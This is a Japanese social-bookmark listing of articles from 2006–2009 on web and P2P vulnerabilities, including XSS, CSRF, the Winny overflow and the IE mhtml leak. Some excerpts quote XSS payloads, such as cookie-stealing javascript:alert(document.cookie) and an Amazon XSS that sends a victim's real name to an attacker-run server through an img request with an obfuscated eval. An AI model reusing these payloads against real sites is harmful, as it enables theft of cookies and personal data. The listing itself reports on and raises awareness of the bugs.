[B! 脆弱性] denkenのブックマーク

denken id:denken

脆弱性に関するdenkenのブックマーク (30)

知らなかったらNGなWEBアプリケーション脆弱性一覧 : mwSoft blog
先日、AmebaなうがCSRFという非常にポピュラーな脆弱性を披露したかと思ったら、ここ数日はセブンネットショッピングでXSSの脆弱性と、ID推測による他ユーザの個人情報閲覧の問題が発生しているという噂が流れています。ユーザの情報を預かっておきながら、基本的なセキュリティの対策もできていないというのは、銀行に例えるなら、お金を預けようとした時に﹁お金は預かります。ちゃんと保管します。でも警備はあまりしないので盗まれたらスイマセン﹂と言われるようなものだと思う。警備に穴があったというのではなく、まともに警備してませんでした、というのはさすがにありえないことです。そこで、野良WEBプログラマである私が知っている脆弱性を列挙してみた。私はプログラマであってセキュリティの専門家ではないです。しかも今年の春辺りからずっと外向けのWEBプログラムは組んでません。その人間が知っているものを並べ
denken 2009/12/19
1000overすごい

まとめ

脆弱性

セキュリティ
リンク
Yahoo!ブログの脆弱性が修正された | 水無月ばけらのえび日記
届け出ていたYahoo!ブログ (blogs.yahoo.co.jp)のXSS脆弱性が修正されたようなので、「Firefoxではembedのsrcに書かれたスクリプトが動作する」というお話で伏せていた部分を公開しました。 Yahoo!ブログでは他のユーザとドメインを共用していますし、管理画面も同じドメインですので、ブログでスクリプトが動作するとあまり良くないことが起こります。そして、独自のWiki記法で img 要素や embed 要素を書けるのですが、 [[img(javascript:alert(document.cookie))]] [[it em(javascript:alert(document.cookie))]]
denken 2008/09/26
yahoo!

脆弱性

サニタイズ
リンク
IPAたんからお礼が！ - ぼくはまちちゃん！
はじめてのほうこく IPAたんからの返事 IPAたんからへんじこないのつづきです！！！返事きたよ！きてました＞＜ Date: Thu, 01 Feb 2007 20:43:06 +0900 To: Hamachiya2 Subject: ︻IPA#32334280/IPA#11631745/IPA#92669403/IPA#94436430︼届出いただいた件について - ----------------------------------------------------------------- このメールは、以下の取扱い番号に関する連絡です。 IPA#32334280/IPA#11631745/IPA#92669403/IPA#94436430 - ----------------------------------------------------------------
denken 2007/02/06
kyoumoe先生みてますかー?

はまちちゃん

これはすごい

主張

脆弱性
リンク
XSS - 表示系パラメータに存在する盲点 :: ぼくはまちちゃん！
こんにちはこんにちは！！クロスサイトスクリプティングの時間です！ XSSというと…！まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね！たとえばこんな感じのフォームから受け取ったパラメータを、確認として表示するページとか！ (入力) <form action="register.cgi" method="post"> タイトル：<input type="text" name="title"> ← 「ぼくはまちちゃん！」を入力本文：<input type="text" name="body"> ← 「こんにちはこんにちは！！<script>alert(1)</script>」を入力 </form> (確認) <p>この内容で登録していい？</p> <p> タイトル：ぼくはまちちゃん！<br> 本文：こんにちはこんにちは！！<script>alert
denken 2006/08/03
むにむに

XSS

セキュリティ

脆弱性

これはすごい
リンク
Webアプリケーション脆弱性チェックツール:Chorizo:phpspot開発日誌
Chorizo! Secure your webapplications on the fly! WebアプリケーションセキュリティチェックツールのChorizoの紹介。 Chorizo自体がプロキシとなり、そのプロキシを通して脆弱性をチェックしたいサイトを訪れることで次のようなツールボックスがページに表示され、このツールボックス上から各種セキュリティスキャンが出来るようです。 XSSチェックやPHP脆弱性チェック、SQLインジェクションチェック等ができるようです。 Chorizo! 設定ムービー動作ムービー
denken 2006/07/27
セキュリティ

ソフト

PHP

ツール

脆弱性

あとで
リンク
「ウイルスの登場は時間の問題、Winnyの使用は今すぐ中止してほしい」
P2Pファイル共有ソフト﹁Winny﹂をユーザーを狙ったウイルスによる情報漏洩事件が相次ぐ中、4月にはWinny本体にも脆弱性が存在することが公表され、Winnyを利用し続けることのリスクはさらに高まっている。Winnyの脆弱性とはどのようなもので、Winnyの利用にはどのような危険があるのか、Winnyの脆弱性を発見した米eEye DigitalSecurityの鵜飼裕司氏に伺った。 ● Winnyを利用し続けるのは極めて危険な状況﹁Winnyの脆弱性は非常に危険なもので、Winnyを使用しているだけで悪意のあるプログラムを送り込まれ、PCを乗っ取られる危険性がある。現在Winnyを使用している人は、今すぐ使用を中止してほしい﹂と鵜飼氏はWinnyの危険性を警告する。鵜飼氏が発見したWinnyの脆弱性は、Winnyが使用するデータ交換ポートに対して悪意のあるデータを送信することでヒ
denken 2006/05/26
「Winnyのプロトコルや挙動を解析し、Winnyネットワークに参加しているユーザーの一覧を数時間で取得できるシステムも開発した。現在、常時数十万のユーザーがWinnyネットワークに参加していることが観測されており」

Winny

セキュリティ

脆弱性

P2P

ネット

これはやばい
リンク
Wordの脆弱性突いた新たなゼロデイ攻撃
Wordの未知の脆弱性を悪用し、トロイの木馬を使ってバックドアを仕掛けるゼロデイ攻撃が報告された。Microsoftはパッチの作成を進めている。セキュリティ各社が5月19日、Microsoft Wordの未知の脆弱性を突いた電子メール攻撃について報告した。Microsoftでは問題を修正するためのパッチを作成し、6月にもリリースする予定。 SANS InternetStorm Center︵ISC︶が公開した情報によれば、脆弱性は完全にパッチが当てられたシステムで確認され、特定の組織を標的とした電子メール攻撃に利用された。問題のメールは特定の個人あてに、その組織のドメインで内部から出されたように見せ掛けてあり、ウイルス対策ソフトでも検出されなかったという。添付されたWord文書を開くと、Wordの未知の脆弱性を突いてトロイの木馬が起動し、Wordがクラッシュする仕組みになっていた。攻
denken 2006/05/20
Word

セキュリティ

脆弱性

MS
リンク
本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん！
↓これ超おすすめマンガなんです！！！うそだけど！ ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…！本名吸い取り機のできあがり！こわいね＞＜リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ！ (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
denken 2006/05/19
むはー

はまちちゃん

amazon

XSS

脆弱性

セキュリティ

これはひどい

javascript
リンク
超mixi足あとちょうについて :: ぼくはまちちゃん！
こんにちはこんにちは！！現在の超mixi足あとちょうは、何度かのバージョンアップをして、以下のような内容になってますよ！きみのMIXI ID：きみのpostkey：きみのメールアドレス： ※mixiの修正が4回入って、現在は非表示きみのブラウザ：きみのホスト名：リンク元： (おまけ４) きみのYahoo ID： (おまけ５) きみのHatena ID： (おまけ２) きみのlivedoor ID： (おまけ６) きみのGoogleアカウント： (おまけ３) きみのなまえ(amazon)： (おまけ７) きみの好みのタイプ： (おまけ１) きみのクリップボードの中身ところで、超mixi足あとちょうの追記にも書いたけれど、「hamachiya.com を見にいかなければ大丈夫」で思考停止するのって一番危険なんじゃないかな、と思うんだけど…！ここをみている一部の方々は、たぶ
denken 2006/05/06
「「hamachiya.com を見にいかなければ大丈夫」で思考停止するのって一番危険なんじゃないかな、と思うんだけど…！」

はまちちゃん

セキュリティ

思想

啓蒙

思考

脆弱性

ネット
リンク
「Winnyから情報漏えいを防ぐのは技術的に容易」--開発者の金子勇氏 - CNET Japan
ファイル交換ソフト「Winny」開発者の金子勇氏は5月2日に開催されたイベントの中で、相次ぐ情報漏えいを受けて、「Winnyネットワークからの情報漏えいを防ぐのは技術的に非常に容易」と説明した。アスキー主催の情報セキュリティセミナー「止めるぞ！　情報漏えい」で同氏が語っている。金子氏の説明によれば、Winnyがネットワークに公開するフォルダ「アップフォルダ」を指定するのは、Winny.exeと同一フォルダに置かれる「Upfolder.txt」というテキストファイルだ。このテキストファイルにはたとえば「Path=D:\Winny\Up」という形で、アップフォルダが指定されることになる。 Winnyを対象にして情報を公開するウイルスは、このUpfolder.txtを書き換えるなどして、公開するフォルダそのものを変更する。またこれらのウイルスは、Upfolder.txtを「読み込み専用にしても
denken 2006/05/06
47氏

写真

Winny

P2P

セキュリティ

脆弱性

アップデート

ソフト
リンク
ネットのドメインの85%は乗っ取り攻撃から逃れられない | スラド
oddmake曰く、"BBC記事より。コーネル大学計算機学科のEmin Gun Sirer教授らの研究チームは、インターネット上のドメインが名前解決に依存するDNSサーバの数やその脆弱性に対して大規模な調査を行い、実に85%ものドメインが乗っ取りに対して脆弱であることがわかったと発表した︵PDFの論文︶。平均的なドメインはルートサーバを除いて約46ものDNSサーバに名前解決を依存しており、そのうち17%ものDNSサーバに良く知られた脆弱性があり、セキュアなDNSサーバにDDoS攻撃を仕掛ける一方で脆弱なDNSサーバを攻撃するという手法によりほとんどのドメインは乗っ取られてしまうということだ。調査の結果から判明した脆弱なドメイン名Top500には、www.openbsd.org、www.openssh.com、www.daemonnews.org、www.emacswiki.orgといっ
denken 2006/05/01
ドメイン乗っ取りは、まぁ乗っ取られたほうが悪いな。

ネット

ドメイン

脆弱性

セキュリティ

DNS
リンク
CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですねの対策 - 2nd life (移転しました)
hoshikuzu | star_dust の書斎#P20060428MHTMLREDIRECT で指摘されているように、現在の WinIE ではmhtml スキームを悪用して、クロスドメインの html を取得することが可能になってしまっています。これを利用したはまちちゃんの実証コードを踏んだ人も居るでしょう(実際に WinIE だと情報が抜かれるので、安易に WinIE で見に行かないで下さい)。この対策として id:hosikuzu:20060428#P20060428MHTMLREDIRECT では以下のような対策方法が提示されています。そもそも信頼できないページを見ないIE使わないアクティブスクリプトとAxtiveXを切るレジストリでmhtmlスキームのハンドラを殺すこの中で一番簡単かつ安心なのは WinIE を使わないことですが、IEコンポーネントブラウザなどを
denken 2006/05/01
CSSXSS

脆弱性

UA

IE

mhtml

対策
リンク
超mixi足あとちょう
公開終了です＞＜ Hamachiya.com [参考サイト] → CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですね → Secunia - Advisories - Internet Explorer "mhtml:" Redirection Disclosure of Sensitive Information (追加： 2nd lifeさまによる、レジストリをつかったユーザー側での対策方法) → 川o・-・）＜2nd life - CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですねの対策
denken 2006/04/30
やっぱSNSとかああいうサービスは毎回ログインするのが安全だべな。はまちちゃんの次回策に大期待。

はまちちゃん

セキュリティ

脆弱性

IE

mhtml

mixi

これはひどい

これはすごい
リンク
■ - hoshikuzu | star_dust の書斎
■CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですねそのうち整理され、まとまった情報が日本語で出ることでしょうけれど。とりあえず。 Secunia - Advisories - Internet Explorer "mhtml:" Redirection Disclosure of Sensitive Information Secunia - Internet Explorer Arbitrary Content Disclosure Vulnerability Test CSSXSS脆弱性と同じ方向性のIEの脆弱性が発見され、実証コードがSecuniaでデモンストレーションされています。このことによりログイン中の本人でないと閲覧できないはずの情報が、罠ページを踏むことで悪意ある者に盗まれます。セッション管理にも影響あり。最悪乗っ取りまで考えられるかも… mhtml
denken 2006/04/30
CSSXSS

脆弱性

IE

セキュリティ
リンク
発見者が語る「Winnyのセキュリティ・ホール」
米eEye DigitalSecurity︵以下，eEye︶は米国時間4月21日に、Winny︵ウィニー︶のヒープ・オーバーフロー脆弱性︵セキュリティ・ホール︶に関するアドバイザリを発表しました︵関連記事︶。今回は、その脆弱性の処理の経緯や脆弱性の概要についてお話したいと思います。3月22日︵PST︶ - IPAに脆弱性の処理を依頼先月からWinnyに関する本格的なリサーチを開始したことは、以前の﹁ITpro Watcher﹂でお伝えしました︵関連記事︶。リサーチで最も時間を費やしていることは、技術的な事柄ではなく、Winnyを取り巻く社会的な事柄を理解することです。コード解析、Winnyネットワーク解析、脆弱性監査など、技術的なリサーチの基本部分は数日でほぼ完了しました。技術的な部分は私と金居の2人で事足りましたし、さほど大きなハードルもありませんでした。しかし、Winnyを取り
denken 2006/04/27
Winny

P2P

セキュリティ

脆弱性
リンク
Winnyにバッファオーバーフローの脆弱性、回避策は「Winny利用の中止」
Windows SQL Server 2005サポート終了の4月12日が迫る、報告済み脆弱性の深刻度も高く、早急な移行を
denken 2006/04/22
Winny

セキュリティ

脆弱性
リンク
Winnyにバッファオーバーフローの脆弱性、回避策は「利用の中止」のみ
P2Pファイル共有ソフト﹁Winny﹂に、バッファオーバーフローの脆弱性が存在することが明らかになった。回避策はWinny利用を中止すること。 P2Pファイル共有ソフト﹁Winny﹂に、バッファオーバーフローの脆弱性が存在することが4月21日明らかになった。情報処理推進機構︵IPA︶とJPCERTコーディネーションセンター︵JPCERT/CC︶が運営する脆弱性情報公開サイト、JVN︵JP Vendor Status Notes︶によると、Winny 2.0 b7.1およびそれ以前の通信処理に脆弱性が存在する。細工を施されたパケットを受け取るとにバッファオーバーフローが発生し、Winnyが異常終了する可能性がある。米eEye DigitalSecurityの鵜飼裕司氏が発見し、IPAに問題を報告した。開発者による脆弱性への根本的な対策︵パッチや新バージョンなど︶は存在しないため、Win
denken 2006/04/22
Winny

セキュリティ

脆弱性
リンク
Japan Vulnerability Notes／ベンダーからの情報
金子勇からの情報脆弱性識別番号‥JVN#74294680 脆弱性タイトル‥ ステータス‥該当製品あり以下の情報は、製品開発者から JVN に提供されたものです。Ｗｉｎｎｙの制作者の金子勇です。私自身は、諸般の都合により、Ｗｉｎｎｙのアップデートおよび脆弱性の具体的な検証が困難な状況にあります。ご利用はＷｉｎｎｙを十分ご理解の上でお願いします。なお、現時点では、具体的な攻撃方法が明らかではなく、また、Ｗｉｎｎｙは様々な部分でチェックをしているので、私としては、仮にバッファーオーバーフローの脆弱性への攻撃を想定した場合でも、これによりあらゆる任意のコードが実行が可能という訳では無いと判断しております。
denken 2006/04/22
「Ｗｉｎｎｙは様々な部分でチェックをしているので、私としては、仮にバッファーオーバーフローの脆弱性への攻撃を想定した場合でも、これによりあらゆる任意のコードが実行が可能という訳では無い」

47氏

Winny

セキュリティ

脆弱性

反論

声明
リンク
脆弱性関連情報の取扱い：Winny（ウィニー）の安全上の問題箇所（脆弱性）の公表について：IPA 独立行政法人情報処理推進機構
独立行政法人情報処理推進機構︵略称‥IPA、理事長‥藤原武平太︶は、ファイル交換ソフトWinny︵ウィニー︶の安全上の問題箇所︵脆弱性︶を本日公表しました。具体的には、Winnyには通信処理に脆弱性があるというものです。悪用されると、ソフトウェアが異常終了する可能性があるのみならず、一般的に、この脆弱性は、当該プログラムが動作しているコンピュータ︵パソコン︶を外部から乗っ取られる可能性があるものです。開発者による修正方法は公表されていませんので、回避方法は﹁Winny利用の中止﹂です。 Winnyは、インターネットを利用して不特定多数のユーザ間でファイルを交換できるソフトウェアです。 Winnyには、通信処理に安全上の問題箇所︵バッファオーバーフローの脆弱性︶があります。悪用されると、遠隔の第三者によるソフトウェアの異常な動作停止の可能性があるのみならず、一般的に、バッファオーバーフロ
denken 2006/04/21
バッファオーバーフローで任意のコードが実行可能

Winny

セキュリティ

これはやばい

脆弱性
リンク
Winnyに実装上の欠陥あり! - アンカテ
「Winnyに実装上の深刻な問題点がある」という発表がIPAからありました。 Winny（ウィニー）の安全上の問題箇所（脆弱性）の公表について３．対策方法開発者による修正方法は公表されていませんので、回避方法は「Winny利用の中止」です。残念ながら、現状では全くこの通りです。もしこれを読んでいる人で、Winnyユーザの方がいたら、至急使用をやめてください。今回発表された問題点は、これまで発生した暴露ウィルス等の問題とは全く別の種類の問題点です。アンカテ(Uncategorizable Blog) - Winnyの「要求仕様」と「設計」と「実装」アンカテ(Uncategorizable Blog) - バグ有りWinnyとバグ無しWinnyはやはり区別すべきだと思う今回発表された脆弱性は、この二つのエントリで「実装上の問題点」としているものです。つまり、私はこれはそう簡単には
denken 2006/04/21
WinnyネットワークでなくWinnyそのものの問題。がくぶる

Winny

セキィリティ

脆弱性
リンク
1 2 次のページ